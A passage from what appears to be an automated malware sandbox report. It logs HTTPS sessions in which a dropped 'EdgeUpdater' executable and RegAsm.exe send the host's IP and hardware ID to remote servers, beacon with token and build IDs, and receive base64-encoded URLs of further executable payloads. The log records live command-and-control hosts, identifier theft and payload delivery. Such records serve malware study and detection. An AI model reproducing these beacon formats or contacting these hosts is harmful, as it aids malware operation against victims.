2024-10-02 07:42:09 UTC	16355	OUT	Data Raw: 4e 47 38 4a 7a 33 4f 6d 33 6b 56 6a 34 61 2f 73 65 31 6d 4e 6b 6a 32 48 6d 51 72 35 72 52 7a 71 38 6b 75 49 33 4b 66 63 34 7a 6e 63 32 4f 52 77 4d 39 4a 34 6f 67 2f 73 6e 53 72 48 55 4e 4a 74 6f 46 75 4e 4e 6b 57 4f 31 74 31 41 52 48 56 2f 33 58 6c 41 44 6f 50 6d 55 67 44 75 69 30 50 52 45 6f 36 65 69 76 4e 39 56 38 48 54 78 79 43 44 2b 78 42 72 43 74 70 79 77 57 6b 2f 6d 52 72 39 69 75 74 7a 74 4a 4f 64 37 42 6c 4c 4d 36 74 76 6a 44 4e 38 6e 54 67 5a 6e 31 4c 52 74 63 57 34 31 4b 7a 68 30 32 61 38 53 2b 76 72 43 36 2b 32 72 4c 45 71 4b 49 6a 43 4a 41 77 5a 77 2b 37 39 30 54 77 70 42 79 4f 63 30 30 74 62 66 31 76 38 41 30 77 50 51 61 4b 72 57 55 31 7a 50 46 49 31 31 61 66 5a 6e 57 5a 30 56 66 4d 44 37 6b 44 45 4b 2b 52 30 33 44 42 78 32 7a 69 72 4e 49 41 Data Ascii: NG8Jz3Om3kVj4a/se1mNkj2HmQr5rRzq8kuI3Kfc4znc2ORwM9J4og/snSrHUNJtoFuNNkWO1t1ARHV/3XlADoPmUgDui0PREo6eivN9V8HTxyCD+xBrCtpywWk/mRr9iutztJOd7BlLM6tvjDN8nTgZn1LRtcW41Kzh02a8S+vrC6+2rLEqKIjCJAwZw+790TwpByOc00tbf1v8A0wPQaKrWU1zPFI11afZnWZ0VfMD7kDEK+R03DBx2zirNIA
2024-10-02 07:42:09 UTC	11394	OUT	Data Raw: 41 43 64 4b 50 38 38 43 6c 70 4d 38 35 6f 47 46 42 39 75 61 57 6b 50 4e 41 78 4b 50 72 51 65 74 48 53 67 44 30 4f 6d 6b 5a 72 77 2b 69 76 44 2f 74 62 2b 35 2b 50 2f 41 4f 62 2f 56 2f 2f 41 4b 65 66 68 2f 77 54 32 30 78 41 39 71 62 35 4b 2b 6c 65 4b 55 55 66 32 71 76 35 50 78 2f 34 42 58 39 67 76 2f 6e 35 2b 48 2f 42 50 61 2f 4a 58 30 6f 38 6b 65 6c 65 4b 55 55 66 32 71 76 35 50 78 2f 34 41 66 32 43 2f 77 44 6e 35 2b 48 2f 41 41 54 32 7a 79 6c 39 4b 54 79 6c 39 4b 39 70 74 62 57 33 61 30 68 5a 6f 49 69 54 47 70 4a 4b 44 6e 69 70 66 73 6c 74 2f 77 41 2b 38 58 2f 66 41 72 4c 2b 32 56 2f 7a 37 2f 48 2f 41 49 42 74 2f 71 32 2f 2b 66 76 2f 41 4a 4c 2f 41 4d 45 38 52 38 70 66 53 6b 38 6c 66 53 76 62 2f 73 6c 74 2f 77 41 2b 38 58 2f 66 41 6f 2b 79 57 33 2f 50 76 Data Ascii: ACdKP88ClpM85oGFB9uaWkPNAxKPrQetHSgD0OmkZrw+ivD/tb+5+P/AOb/V//AKefh/wT20xA9qb5K+leKUUf2qv5Px/4BX9gv/n5+H/BPa/JX0o8keleKUUf2qv5Px/4Af2C/wDn5+H/AAT2zyl9KTyl9K9ptbW3a0hZoIiTGpJKDnipfslt/wA+8X/fArL+2V/z7/H/AIBt/q2/+fv/AJL/AME8R8pfSk8lfSvb/slt/wA+8X/fAo+yW3/Pv
2024-10-02 07:42:10 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49795	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:09 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:42:09 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:09 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:42:09 UTC	613	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UZR3zLHoBks3hvXMrcml8dOH3i1wQQJLyom%2FlooGJq0%2BbasJyscvFi4Zf9NKgZf8%2B2tnoYZoMPXvJPgxNS%2FJWmFvpBN3P31uhr0NtyP8PqYTKI5IQ7TyN%2F%2F8NOJFHfJ5RA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30ddc5df90c9c-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.4	49796	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:10 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:10 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:10 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:42:10 UTC	611	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bm4pkzA0RjBF1Yqa%2Faf%2FPEQ3bhmGvdnLwA%2FMp5SrID4nyCBhK0oGiWwJdA1oE4sstAdp5memk2VagPsxXLs4nT9jcQZV15fPMcBe7NsMr%2FllLailcOsag4LXd1zQWZsP9A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30de28b124259-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
43	192.168.2.4	49798	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:11 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:42:11 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:42:11 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:42:11 UTC	603	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PQflb5xNWd3LMLSumdykBSZHL9ii3guAuRmEYLOGNnJtWDICKnvUKdZoT6qmKHQSJ9h617tHvX%2BR1MTKdFrI8lztUG6ex8G2emWMmKuu8e9P38y2gXpfiO36dAFYkw69cQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30dea3f6543c8-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49797	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:11 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIDBAFHCAKFBGCBFHIJ User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:11 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 44 42 41 46 48 43 41 4b 46 42 47 43 42 46 48 49 4a 0d 0a 43 6f 6e 74 Data Ascii: ------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------KFIDBAFHCAKFBGCBFHIJContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------KFIDBAFHCAKFBGCBFHIJCont
2024-10-02 07:42:12 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:12 UTC	276	IN	Data Raw: 31 30 38 0d 0a 4d 54 49 32 4e 44 45 78 4e 58 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 78 66 47 74 72 61 32 74 38 4d 54 49 32 4e 44 45 78 4e 6e 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4e 6b 4f 44 4d 33 59 57 4e 66 64 6d 46 6b 5a 32 64 6b 63 32 45 75 5a 58 68 6c 66 44 46 38 61 32 74 72 61 33 77 78 4d 6a 59 30 4d 54 45 33 66 47 68 30 64 48 41 36 4c 79 38 78 4e 44 63 75 4e 44 55 75 4e 44 51 75 4d 54 41 30 4c 33 42 79 62 32 63 76 4e 6a 5a 6d 59 6d 5a 6a 59 7a 4d 77 4d 57 45 7a 4d 56 39 7a 64 33 64 7a 4c 6d Data Ascii: 108MTI2NDExNXxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwxfGtra2t8MTI2NDExNnxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2NkODM3YWNfdmFkZ2dkc2EuZXhlfDF8a2tra3wxMjY0MTE3fGh0dHA6Ly8xNDcuNDUuNDQuMTA0L3Byb2cvNjZmYmZjYzMwMWEzMV9zd3dzLm

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49800	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:15 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----JDAKJJDBGCAKKFHIJEGH User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:15 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 4a 44 41 4b 4a 4a 44 42 47 43 41 4b 4b 46 48 49 4a 45 47 48 0d 0a 43 6f 6e 74 Data Ascii: ------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------JDAKJJDBGCAKKFHIJEGHContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------JDAKJJDBGCAKKFHIJEGHCont
2024-10-02 07:42:16 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:16 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49802	172.67.208.141	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: questionsmw.store
2024-10-02 07:42:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:17 UTC	778	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=trr0nmda58nbj02oifd98t1tq7; expires=Sun, 26 Jan 2025 01:28:56 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P%2FkATqUYA9hg1zunWJ7QhgoJ9GpqIp1kvIGM7qQB67OUHKa6BttqoZX%2Ftfk2faADcZPuFmHUx4DIDJH%2FyX1515NKHHPVYceztmaqnqa%2BsvO8p94CBToLpSY1ufHQK%2FCfKcMluA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e0bbdbf42e3-EWR
2024-10-02 07:42:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49803	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:17 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHIECGCAEBFIIDHIDGIE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:17 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 49 45 43 47 43 41 45 42 46 49 49 44 48 49 44 47 49 45 0d 0a 43 6f 6e 74 Data Ascii: ------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------DHIECGCAEBFIIDHIDGIEContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DHIECGCAEBFIIDHIDGIECont
2024-10-02 07:42:18 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:18 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49804	188.114.96.3	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:18 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soldiefieop.site
2024-10-02 07:42:18 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:19 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8rj9tumiisssst0ndnljedk21j; expires=Sun, 26 Jan 2025 01:28:57 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RKZRVc5nFoaZu5zpLw2CqfczAW1BDUoQx%2FggeARMxMSN415z46wmVm1tIc7gPPYwa%2F4O4NTbvppJiIhVnsxk3I8IxY5f9y0Dnrcybo6DS4cT9EKw%2B39gflLcEEsOq5h8llWs"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e171b7f0fa1-EWR
2024-10-02 07:42:19 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49805	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:19 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:42:19 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------DAFBGHCAKKFCAKEBKJKKCont
2024-10-02 07:42:20 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:42:20 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49806	104.21.56.150	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:19 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abnomalrkmu.site
2024-10-02 07:42:19 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:20 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iku6v3gqjndqbgpu83pd7terbe; expires=Sun, 26 Jan 2025 01:28:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tLh4mIfC06E9yqBfaXWTMkmbMqSql7xp%2FB5IFSlFZNGRaBHm27RnQI07ooTyUqQUsrT%2FOJB%2FiY5zBclWIBxxgz8PyuYCW2Ie1xlJIduo3Vp1e34ufwasbTNRQd30ptQdTEYc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e1eaa707cf4-EWR
2024-10-02 07:42:20 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49807	104.21.84.18	443	2044	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:21 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treatynreit.site
2024-10-02 07:42:21 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:42:21 UTC	791	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=iil91jd1s065s109b93pjpsi5r; expires=Sun, 26 Jan 2025 01:29:00 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gU7DfjVYc%2Fd1NAv8GlvkK4V0aFAF%2FqSoFqVtVE%2B92A%2F6mzBK2xfaK3qyV3QqvYElf3v67AHB6JY2UJAiJiIeu96NFBOYXiqkMVbG6Q5lHzMXBoUWKuwTncKrsRxsUD6ZOCQD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30e27acedde99-EWR
2024-10-02 07:42:21 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:42:21 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49808	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:42:21 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AFIEGIECGCBKFIEBGCAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
